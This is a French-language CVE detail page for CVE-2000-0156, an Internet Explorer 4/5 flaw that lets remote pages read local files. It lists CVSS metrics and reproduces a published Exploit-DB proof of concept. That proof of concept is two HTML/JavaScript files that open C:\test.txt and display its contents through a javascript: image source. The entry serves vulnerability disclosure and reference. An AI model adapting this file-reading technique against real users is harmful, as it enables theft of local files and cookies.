CVE-2000-0156 : Détail

CVE-2000-0156

0.68%V3
Network
2000-03-22
04h00 +00:00
2005-11-02
09h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Internet Explorer 4.x and 5.x allows remote web servers to access files on the client that are outside of its security domain, aka the "Image Source Redirect" vulnerability.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 19719

Date de publication : 2000-01-06 23h00 +00:00
Auteur : Georgi Guninski
EDB Vérifié : Yes

Microsoft Internet Explorer 4.0 for Windows 3.1/Windows 95,Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.5 preview,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0,Internet Explorer 5.0.1 Security Zone Settings Lag Vulnerability source: https://www.securityfocus.com/bid/923/info When a new document is loaded into an IE window, IE will not update the Security Zone settings for that window until the new document is completely loaded. This means that if a local document is loaded, and then a large remote document is loaded that has JavaScript at the very beginning, the JavaScript may load and execute before the Security Zone settings are updated. This could lead to remote and untrusted JavaScript running as local trusted code, with full access to local files, cookies, etc. -----------------img2main.html--------------------------------------- <A HREF="img2.html" TARGET="victim">link</A> <SCRIPT> alert("Create a short text file C:\\test.txt and it will be read and shown in a message box"); a=window.open("file://c:/test.txt","victim"); setTimeout("document.links[0].click()",2000); </SCRIPT> --------------------------------------------------------------------- ----------------img2.html-------------------------------------------- <HTML> <IMG SRC="javascript:a=window.open('javascript:alert(\'Here is your file: \'+opener.document.body.innerText)');alert('Just an alert, but is necessary. Wait a little.')"> </HTML> ---------------------------------------------------------------------

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 4.0

Microsoft>>Internet_explorer >> Version 4.0.1

Microsoft>>Internet_explorer >> Version 5.0

Microsoft>>Internet_explorer >> Version 5.01

Références

http://www.osvdb.org/7827
Tags : vdb-entry, x_refsource_OSVDB